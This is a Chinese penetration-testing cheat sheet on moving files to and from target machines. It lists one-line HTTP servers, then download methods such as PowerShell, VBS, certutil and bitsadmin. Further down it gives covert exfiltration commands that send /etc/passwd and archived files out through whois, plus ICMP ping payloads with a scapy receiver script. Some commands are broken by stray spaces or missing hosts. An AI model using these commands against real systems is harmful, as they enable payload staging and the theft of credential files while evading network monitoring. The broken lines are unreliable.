渗透测试之文件上传与下载

渗透测试之⽂件上传与下载
⼀、搭建 HTTP server提供下载
python2
python -m SimpleHTTPServer 1337
python3
python -m http.server 1337
PHP 5.4+
php -S 0.0.0.0:1337
ruby
ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 1337, :DocumentRoot => Dir.pwd).start' ruby -run -e httpd . -p 1337
Perl
perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>1337); $s->mount("/"=>{path=>"."}); $s->start' perl -MIO::All -e 'io(":8080")->fork->ac cept->(sub { $_[0] < io(-x $1 +? "./$1 |" : $1) if /^GET \/(.*) / })'
busybox httpd
busybox httpd -f -p 8000
apache2
/var/www/html #⽹站根⽬录
sudo systemctl start apache2 #开启apache2服务
⼆、⽂件下载
wput
wput dir_name ftp://linuxpig:123456@/
wget
wget /1.rar -O 1.rar
ariac2（需安装）
aria2c -o owncloud.zip https:///community/owncloud-9.0.0.tar.bz2
powershell
$p = New-Object .WebClient
$p.DownloadFile("http://domain/file","C:%homepath%file")
vbs脚本
test.vbs
Set args = Wscript.Arguments Url = "http://domain/file" dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject(" Adodb.Stream") xHttp.Open "GET", Url, False xHttp.Send with bStrm .type = 1' .open .write xHttp.responseBody .savetofile " C:\%homepath%\file", 2 ' e nd with
执⾏：cscript test.vbs
Perl
test.pl
#!/usr/bin/perl use LWP::Simple; getstore("http://domain/file", "file");
执⾏：perl test.pl
Python
#!/usr/bin/python import urllib2 u = urllib2.urlopen('http://domain/file') localFile = open('local_file', 'w') localFile.write(u.read()) localFile.close()
执⾏：python test.py
Ruby
test.rb
#!/usr/bin/ruby require 'net/http' Net::HTTP.start("") { |http| r = http.get("/file") open("save_location", "wb") { |file| file.write(r.body) } }
执⾏：ruby test.rb
PHP
test.php
<?php $url = '/file'; $path = '/path/to/file'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = c url_exec($ch); curl_close($ch); file_put_contents($path, $data); ?>
执⾏：php test.php
NC attacker
本机 cat file | nc -l 1234 target nc host_ip 1234 > file
FTP
ftp 127.0.0.1 username password get file exit
TFTP
tftp -i host GET C:%homepath%file location_of_file_on_tftp_server
Bitsadmin
bitsadmin /transfer n http://domain/file c:%homepath%file
Window ⽂件共享
net use x: \127.0.0.1\share /user:userID myPassword
SCP 本地到远程
scp file user@:/tmp
SCP 远程到本地
scp user@:/tmp file
rsync 远程rsync服务器中拷贝⽂件到本地机
rsync -av root@192.168.78.192::www /databack
本地机器拷贝⽂件到远程rsync服务器
rsync -av /databack root@192.168.78.192::www
certutil.exe
certutil.exe -urlcache -split -f /file
copy
copy \\IP\ShareName\file.exe file.exe
WHOIS 接收端 Host B：
nc -vlnp 1337 | sed "s/ //g" | base64 -d
发送端 Host A：
whois -h host_ip -p 1337 `cat /etc/passwd | base64`
First:
ncat -k -l -p 4444 | tee files.b64 #tee to a file so you can make sure you have it
Next
tar czf - /tmp/* | base64 | xargs -I bits timeout 0.03 whois -h host_ip -p 4444 bits
Finally
cat files.b64 | tr -d '\r\n' | base64 -d | tar zxv #to get the files out
PING 发送端:
xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done
接收端ping_receiver.py:
ping_receiver.py
import sys try: from scapy.all import * except: print("Scapy not found, please install scapy: pip install scapy") sys.exit(0) def process_packet(pkt): if pkt.h aslayer(ICMP): if pkt[ICMP].type == 8: data = pkt[ICMP].load[-4:] print(f'{data.decode("utf-8")}', flush=True, end="", sep="") sniff(iface="eth0", prn=proce ss_packet)
python3 ping_receiver.py。